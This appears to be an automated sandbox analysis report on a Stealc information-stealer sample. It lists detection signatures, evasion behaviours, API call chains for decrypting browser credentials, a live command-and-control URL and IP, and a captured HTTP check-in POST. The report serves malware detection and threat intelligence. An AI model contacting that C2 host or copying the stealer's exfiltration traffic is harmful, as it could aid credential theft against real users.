Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572096
MD5: c1950c4aafa568b63462b2131c67ceab
SHA1: e2aefdf02e7081c1b6bd03affd8d336642388854
SHA256: 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1136 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C1950C4AAFA568B63462B2131C67CEAB)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.1656030162.00000000052F0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 1136 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 1136 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
              No Sigma rule has matched
Suricata alert: Timestamp: 2024-12-10T05:46:59.672495+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP:Port: 192.168.2.4:49730 | Destination IP:Port: 185.215.113.206:80 | Protocol: TCP

              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpy~C4 | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php47 | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpp7 | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpez | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: http://185.215.113.206/c4becf79229cb002.phpp7 | Virustotal: Detection: 17%
Source: file.exe | Virustotal: Detection: 51%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00594B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00594B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00596000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00596000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B4090 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_005B4090
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00599BE0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00599BE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00599B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00599B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A6DE0 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_005A6DE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059ED90 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0059ED90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00597690 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00597690
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A6FF9 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_005A6FF9
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AE330 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005AE330
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A1C40 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005A1C40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A3CC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A3CC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ACCE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005ACCE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059DD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0059DD70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A15C0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A15C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005915B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005915B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005915A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005915A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ADE50 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_005ADE50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AD640 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005AD640
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A4EC0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A4EC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A2749 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005A2749
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A2730 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_005A2730

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  Host: 185.215.113.206  Connection: Keep-Alive  Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 37 35 42 31 38 34 33 37 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"3E75B184375B340779059------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"stok------JKKFIIEBKEGIEBFIJKFI--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00596B80 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  Host: 185.215.113.206  Connection: Keep-Alive  Cache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 37 35 42 31 38 34 33 37 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"3E75B184375B340779059------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"stok------JKKFIIEBKEGIEBFIJKFI--
Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.0000000001646000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.0000000001634000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.0000000001646000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php47
Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpez
Source: file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp7
Source: file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy~C4
Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpz
Source: file.exe, 00000000.00000002.1716207781.0000000001646000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.2065
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00599876 CreateDesktopA,lstrcat,lstrcat,lstrcat,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008930C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B48D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094F02F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00954073
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CD1D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00890948
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F336B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094BBC9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00946B36
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086AB5D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009485A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0092CD04
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00943526
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00821D4C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00952632
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00945731
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00594980 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: yyknqjng ZLIB complexity 0.9947840568286681
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B39F0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005ACBE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\QWVKCJDY.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 51%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
